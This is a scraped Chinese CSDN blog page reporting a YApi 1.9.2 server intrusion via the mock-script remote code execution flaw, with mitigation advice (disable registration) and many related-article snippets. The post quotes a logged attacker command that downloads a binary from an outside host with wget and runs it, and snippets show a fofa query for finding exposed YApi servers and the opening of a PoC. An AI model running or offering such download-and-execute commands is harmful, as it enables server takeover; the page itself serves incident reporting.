​Yapi平台-有安全漏洞,服务器真被入侵了,附POC

最新推荐文章于 2024-04-20 21:52:20 发布
最新推荐文章于 2024-04-20 21:52:20 发布
阅读量771 收藏 2
点赞数 1
分类专栏: 红蓝对抗 文章标签: 安全 信息安全 运维 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34923966/article/details/118558750
版权
    最近看到有人的YAPI接口管理平台服务器被黑了。发现这个漏洞好像部分还存在,漏洞利用前提还是在注册用户的前提下。所以应急方式也是先关闭注册功能,排查已经注册的用户。看看有没有恶意用户。

版本号

版本: 1.9.2

什么问题

服务器被入侵了, 阿里云报的:

 

    
 
  1.  
    -[25877] PM2 v4.4.0: God Daemon (/root/.pm2)
     
    2. 
 
  2.  
    -[26378] node server/app.js
     
    3. 
 
  3.  
    -[31498] /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
     
    4. 
 
  4.  
    -[25877] PM2 v4.4.0: God Daemon (/root/.pm2)
     
    5. 
 
  5.  
    -[26378] node server/app.js
     
    6. 
 
  6.  
    -[25877] PM2 v4.4.0: God Daemon (/root/.pm2)
     
    7. 
 
  7.  
    -[26378] node server/app.js
     
    8. 
 
  8.  
    -[31498] /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
     
    9. 
 
  9.  
    -[31502] ./20000
     
    10. 
 
  10.  
    -[31503] ./20000
     
    11. 
 
  11.  
    该告警由如下引擎检测发现:
     
    12. 
 
  12.  
    13. 


                

        

        

    




        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  渗透测试教程
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    1
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    2
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
Yapi Mock 远程代码执行漏洞

				
			

			

				

					weixin_45694388的博客
				

				

					07-09
					
					577
					
				

			

		

		

			
				
跟风一波复现Yapi
漏洞描述:
YApi接口管理平台远程代码执行0day漏洞,攻击者可通过平台注册用户添加接口,设置mock脚本从而执行任意代码。鉴于该漏洞目前处于0day漏洞利用状态,强烈建议客户尽快采取缓解措施以避免受此漏洞影响
fofa:
Fofa:app="YApi"

漏洞复现:

默认注册功能开启。
注册后创建项目:
添加接口:
创建接口成功:

选择“高级Mock”,“脚本”,开启脚本:

写入poc并保存:
const sandbox = this
const ObjectConstruc

			
		

	



                

              
                



	

		

			

				
					
哭了,21k Star 的 Yapi 被黑客入侵

				
			

			

				

					程序员秋风的博客
				

				

					07-20
					
					1181
					
				

			

		

		

			
				
事情是这样的,由于我们项目使用了这个 Yapi 项目,前几天收到了安全组的预警通知,说 Yapi 被爆出了安全漏洞,新注册的用户,可以在你的服务器执行任意代码,删除任意东西,让我紧急修改!!
心想这么大个开源项目(21.7k),居然有这么严重的安全漏洞,不应该呀。

相信很多小伙伴都用过这款开源软件来用作接口管理工具,但是为了防止有一些小伙伴不知道这个库是干嘛的,我就大概介绍一下。

YApi (https://github.com/YMFE/yapi)是高效、易用、功能强大的 api 管理平台,旨在为开发

			
		

	



                


  
              

                


	

		

			

				
					
漏洞复现-yapi远程执行命令漏洞复现_yapi命令执行漏洞,硬核

					
最新发布

				
			

			

				

					2401_83947434的博客
				

				

					04-20
					
					1218
					
				

			

		

		

			
				
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。,毕竟实战是检验理的唯一标准嘛~最后就是项目实战,这里带来的是。

			
		

	





	

		

			

				
					
YAPI 安全漏洞问题,一文修复全解决

				
			

			

				

					贾世鑫的博客
				

				

					09-01
					
					1121
					
				

			

		

		

			
				
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。

目前Yapi在GitHub的关注数有523,Star数21.7k,Fork数3.7k,使用的企业非常广泛,包括阿里巴巴、腾讯、百度、去哪儿等等。

近日,不少用户反映YApi平台存在高危漏洞,攻击者可利用该漏洞在目标服务器上执行任意代码

			
		

	



		

			
		



	

		

			

				
					
漏洞复现】Yapi接口管理平台RCE漏洞汇总

				
			

			

				

					做自己喜欢的事,并将其发挥到极致!
				

				

					01-10
					
					5817
					
				

			

		

		

			
				
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。

			
		

	





	

		

			

				
					
YApi接口管理平台远程代码执行漏洞复现

				
			

			

				

					qq_44484541的博客
				

				

					11-01
					
					347
					
				

			

		

		

			
				
YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI旨在为开发、产品和测试人员提供更优雅的接口管理服务,可以帮助开发者轻松创建、发布和维护不同项目,不同平台API。有了YAPI,我们可以很方便的测试、管理和维护多个项目的API接口,不像Swagger那样是随应用生和灭的(且线上环境下大多数须关闭),YAPI是一个独立的服务平台

			
		

	





	

		

			

				
					
yapi-to-typescript:根据 YApi 或 Swagger 的接口定义生成 TypeScript 或 JavaScript 的接口类型及其请求函数代码

				
			

			

				

					05-13
				

			

		

		

			
				
YApi to TypeScript  YApi to TypeScript(简称 ytt) 是一个代码生成工具,其可根据 或 的接口定义生成 TypeScript 或 JavaScript 的接口类型及其请求函数代码。 文档 官方文档: 国内镜像: 许可  :copyright:

			
		

	





	

		

			

				
					
Yapi-plugin-export-docx-data-master.zip

				
			

			

				

					02-07
				

			

		

		

			
				
YAPI导出word文件插件,自定义模板,方便有效;  载入模式:  1. yapi plugin --name yapi-plugin-export-docx-data  2. 放入ext中,作为内置插件

			
		

	





	

		

			

				
					
YApi-X-crx插件

				
			

			

				

					04-02
				

			

		

		

			
				
语言:中文 (简体) YApi-X 浏览器插件。 YApi-X 浏览器插件。支持 YApi-X:- 提供跨域请求能力;- 支持文件上传。支持 YApi 官方版:- 提供跨域请求能力;- 支持文件上传(需修改 YApi 源码)。

			
		

	





	

		

			

				
					
yapi-plugin-interface-oauth2-token:这是一个为了解决yapi的oauth2.0项目接口需要做鉴权操作的插件

				
			

			

				

					05-30
				

			

		

		

			
				
yapi-plugin-interface-oauth2-token 这是一个为了解决yapi管理的项目接口需要做鉴权操作的插件,觉得可以给 star 的欢迎 star 一下,你的 star 是我前进的动力之一。 主要解决问题 针对大多数项目来说,特别是现在的...

			
		

	





	

		

			

				
					
YApi 跨域请求插件 cross-request 3.0.0

				
			

			

				

					06-02
				

			

		

		

			
				
cross-request3.0.0插件,支持chrome、火狐等浏览器,下载解压后,通过加载已解压扩张程序添加即可

			
		

	





	

		

			

				
					
pm2-webshell, 在浏览器中,公开一个完全有能力的终端.zip

				
			

			

				

					09-18
				

			

		

		

			
				
pm2-webshell, 在浏览器中,公开一个完全有能力的终端 pm2-webshell 完全能力的Webshell 安装$ pm2 install pm2-webshell$ google-chrome http://localhost:8080默认用户名:foo默认

			
		

	





	

		

			

				
					
七、【漏洞复现】YApi接口管理平台远程代码执行漏洞

				
			

			

				

					weixin_52351575的博客
				

				

					09-21
					
					374
					
				

			

		

		

			
				
YApi接口管理平台存在一种远程代码执行漏洞。攻击者可以在注册并登录YApi后,通过构造特殊的请求来执行任意代码,从而接管服务器。这个漏洞可能会导致严重的安全风险,因此建议用户及时修复漏洞,更新到最新版本的YApi。3、 编辑Yapi目录下的 config.json 文件,设置 closeRegister 为 true,关闭Yapi的前台注册功能。若YApi对外开放注册功能,攻击者可在注册并登录后,通过构造特殊的请求执行任意代码,接管服务器。3.新建接口-接口名称随意-接口路径为/随意。

			
		

	





	

		

			

				
					
关于yapi被攻击的几点想法

				
			

			

				

					Know Destiny的博客
				

				

					12-08
					
					339
					
				

			

		

		

			
				
1.yapi连接的数据库只能内网访问,不能客户端连接
2.多注册几个账号,然后关闭注册功能,下次有新人员来直接修改账户密码即可
3.配置ip白名单,限定特定的局域网访问
4.不要暴漏3000端口,使用nginx代理转发的方式配置,可使用二级域名

...

			
		

	





	

		

			

				
					
yapi漏洞挂马程序chongfu.sh处理

				
			

			

				

					qq_41411704的博客
				

				

					07-12
					
					1179
					
				

			

		

		

			
				
一.【背景】服务器网络卡顿,频繁对外发包,导致服务器网络崩溃。
二.【排查】
2.1 登陆异常服务器,通过top 未检查到异常的CPU 内存异常现象。
2.2 检查网络
 netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'

未发现异常,都是正常的tcp连接状态。
2.3 tcpdump 命令 抓包分析
 tcpdump -i enp3s0


14:53:48.496584 IP smtp-5.etopbags.info

			
		

	





	

		

			

				
					
记第一次被黑经历

				
			

			

				

					cynic_liu的博客
				

				

					06-30
					
					396
					
				

			

		

		

			
				
今天由于我的同步节点在阿里云上,原来是期望通过虚拟机字节访问8545端口,于是放开了该端口的访问权限。很不幸的是,我unlock了一个账号后,该账号里的以太币都被转到了地址0x957cd4ff9b3894fc78b5134a8dc72b032ffbc464上面。网上一查,原来这是黑客专门用的钱包地址所以大家在创建节点的时候务必不要打开rpc端口的访问权限,否则unlock的账号里的钱会被无情的转走...

			
		

	





	

		

			

				
					
koa2项目运行管理 pm2

				
			

			

				

					weixin_45553150的博客
				

				

					05-08
					
					567
					
				

			

		

		

			
				
需求,解决Koa2后台运行的问题.
1\首先安装pm2
npm install pm2 -g

2\建立软连接
cd /usr/local/bin
ln -s /usr/local/NodeJS/node-v10.9.0-linux-x64/bin/pm2 pm2

3\进入Koa2的项目目录
[root@VM_0_3_centos homepage]# pwd
/usr/local/NodeJS...

			
		

	





	

		

			

				
					
运维】记一次yapi安全漏洞导致服务器被木马入侵的处理过程

				
			

			

				

					weixin_41855143的博客
				

				

					07-03
					
					2563
					
				

			

		

		

			
				
       原本今天应该是一个愉快的周六,突然收到阿里云告警,说服务器有木马风险,让我赶紧处理,我顿时就懵逼了,上阿里云一看,好家伙,4个风险提示。




       漏洞出自yapi服务,二话不说先停了服务,然后去yapi的github上看看,果不其然,有人提了相关issue。
       

			
		

	





	

		

			

				
					
你所不知道的pm2

					
热门推荐

				
			

			

				

					uikoo9的专栏
				

				

					01-09
					
					1万+
					
				

			

		

		

			
				
pm2】
如官网介绍的,pm2是nodejs下先进的,生产进程管理器,
安装




1



npminstall-gpm2





常用命令




1
2
3
4
5
6



pm2startapp.js--namedemo
pm2stopdemo
pm2restartdemo
pm2delet

			
		

	





	

		

			

				
					
php接口api统一,API统一管理平台-YApi

				
			

			

				

					05-25
				

			

		

		

			
				
YApi是一个开源的、可视化的、接口管理平台,支持前后端分离,用于接口管理、文档编写、测试环境管理和Mock服务器等功能,方便团队协作和接口测试。它支持多种语言的接口,包括PHP、Java、Node.js等,可以进行接口...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值